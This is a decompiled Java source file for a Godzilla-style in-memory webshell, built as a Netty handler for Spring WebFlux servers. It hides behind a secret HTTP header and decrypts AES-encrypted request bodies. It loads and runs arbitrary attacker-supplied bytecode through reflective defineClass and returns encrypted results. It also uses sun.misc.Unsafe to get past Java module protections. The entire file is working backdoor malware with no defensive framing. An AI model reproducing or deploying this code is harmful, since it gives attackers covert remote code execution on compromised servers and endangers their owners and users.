package com.reajason.javaweb.memshell.springwebflux.godzilla;

import io.netty.buffer.Unpooled;
import io.netty.channel.ChannelDuplexHandler;
import io.netty.channel.ChannelFutureListener;
import io.netty.channel.ChannelHandler;
import io.netty.channel.ChannelHandlerContext;
import io.netty.handler.codec.http.DefaultFullHttpResponse;
import io.netty.handler.codec.http.HttpContent;
import io.netty.handler.codec.http.HttpHeaderNames;
import io.netty.handler.codec.http.HttpRequest;
import io.netty.handler.codec.http.HttpResponseStatus;
import io.netty.handler.codec.http.HttpVersion;
import io.netty.handler.codec.http.LastHttpContent;
import io.netty.util.CharsetUtil;
import java.io.ByteArrayOutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

@ChannelHandler.Sharable
/* loaded from: input_file:com/reajason/javaweb/memshell/springwebflux/godzilla/GodzillaNettyHandler.class */
public class GodzillaNettyHandler extends ChannelDuplexHandler {
    public static String key;
    public static String pass;
    public static String md5;
    public static String headerName;
    public static String headerValue;
    private final StringBuilder requestBody = new StringBuilder();
    private HttpRequest request;
    private static Class<?> payload;

    private static Class<?> defineClass(byte[] bArr) throws Exception {
        URLClassLoader uRLClassLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
        Method declaredMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
        declaredMethod.setAccessible(true);
        return (Class) declaredMethod.invoke(uRLClassLoader, bArr, 0, Integer.valueOf(bArr.length));
    }

    public byte[] x(byte[] bArr, boolean z) {
        try {
            Cipher cipher = Cipher.getInstance("AES");
            cipher.init(z ? 1 : 2, new SecretKeySpec(key.getBytes(), "AES"));
            return cipher.doFinal(bArr);
        } catch (Exception e) {
            return null;
        }
    }

    public void channelRead(ChannelHandlerContext channelHandlerContext, Object obj) throws Exception {
        if (obj instanceof HttpRequest) {
            this.request = (HttpRequest) obj;
            String str = this.request.headers().get(headerName);
            if (str == null || !str.contains(headerValue)) {
                channelHandlerContext.fireChannelRead(obj);
                return;
            }
        }
        if (obj instanceof HttpContent) {
            HttpContent httpContent = (HttpContent) obj;
            String str2 = this.request.headers().get(headerName);
            if (str2 == null || !str2.contains(headerValue)) {
                channelHandlerContext.fireChannelRead(obj);
                return;
            }
            this.requestBody.append(httpContent.content().toString(CharsetUtil.UTF_8));
            if (httpContent instanceof LastHttpContent) {
                try {
                    String decode = URLDecoder.decode(this.requestBody.substring(pass.length() + 1), "UTF-8");
                    this.requestBody.setLength(0);
                    byte[] x = x(base64Decode(decode), false);
                    if (payload == null) {
                        payload = defineClass(x);
                        send(channelHandlerContext, "");
                        return;
                    }
                    Object newInstance = payload.newInstance();
                    ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
                    newInstance.equals(byteArrayOutputStream);
                    newInstance.equals(x);
                    newInstance.toString();
                    send(channelHandlerContext, md5.substring(0, 16) + base64Encode(x(byteArrayOutputStream.toByteArray(), true)) + md5.substring(16));
                    return;
                } catch (Exception e) {
                }
            }
            channelHandlerContext.fireChannelRead(obj);
        }
    }

    public static String base64Encode(byte[] bArr) throws Exception {
        String str = null;
        try {
            Class<?> cls = Class.forName("java.util.Base64");
            Object invoke = cls.getMethod("getEncoder", (Class[]) null).invoke(cls, (Object[]) null);
            str = (String) invoke.getClass().getMethod("encodeToString", byte[].class).invoke(invoke, bArr);
        } catch (Exception e) {
            try {
                Object newInstance = Class.forName("sun.misc.BASE64Encoder").newInstance();
                str = (String) newInstance.getClass().getMethod("encode", byte[].class).invoke(newInstance, bArr);
            } catch (Exception e2) {
            }
        }
        return str;
    }

    public static byte[] base64Decode(String str) {
        byte[] bArr = null;
        try {
            Class<?> cls = Class.forName("java.util.Base64");
            Object invoke = cls.getMethod("getDecoder", (Class[]) null).invoke(cls, (Object[]) null);
            bArr = (byte[]) invoke.getClass().getMethod("decode", String.class).invoke(invoke, str);
        } catch (Exception e) {
            try {
                Object newInstance = Class.forName("sun.misc.BASE64Decoder").newInstance();
                bArr = (byte[]) newInstance.getClass().getMethod("decodeBuffer", String.class).invoke(newInstance, str);
            } catch (Exception e2) {
            }
        }
        return bArr;
    }

    private void send(ChannelHandlerContext channelHandlerContext, String str) throws Exception {
        DefaultFullHttpResponse defaultFullHttpResponse = new DefaultFullHttpResponse(HttpVersion.HTTP_1_1, HttpResponseStatus.OK, Unpooled.copiedBuffer(str, StandardCharsets.UTF_8));
        defaultFullHttpResponse.headers().set("Content-Type", "text/plain; charset=UTF-8");
        defaultFullHttpResponse.headers().set(HttpHeaderNames.CONTENT_LENGTH, Integer.valueOf(defaultFullHttpResponse.content().readableBytes()));
        channelHandlerContext.channel().writeAndFlush(defaultFullHttpResponse).addListener(ChannelFutureListener.CLOSE);
    }

    static {
        try {
            Field declaredField = Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
            declaredField.setAccessible(true);
            Object obj = declaredField.get(null);
            Object invoke = Class.class.getMethod("getModule", new Class[0]).invoke(Object.class, (Object[]) null);
            obj.getClass().getMethod("getAndSetObject", Object.class, Long.TYPE, Object.class).invoke(obj, GodzillaNettyHandler.class, (Long) obj.getClass().getMethod("objectFieldOffset", Field.class).invoke(obj, Class.class.getDeclaredField("module")), invoke);
        } catch (Exception e) {
        }
    }
}
